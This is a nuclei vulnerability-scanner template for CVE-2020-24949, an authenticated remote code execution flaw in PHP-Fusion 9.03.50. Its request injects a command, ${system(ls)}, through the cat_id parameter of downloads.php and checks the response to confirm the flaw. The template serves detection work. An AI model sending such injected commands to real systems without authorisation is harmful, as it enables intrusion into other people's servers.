nuclei-templates/cves/2020/CVE-2020-24949.yaml

31 lines
864 B
YAML

id: CVE-2020-24949
info:
name: PHPFusion 9.03.50 Remote Code Execution
author: geeknik
severity: high
description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
reference:
- https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-24949
tags: cve,cve2020,phpfusion,rce,php
requests:
- method: GET
path:
- "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "infusion_db.php"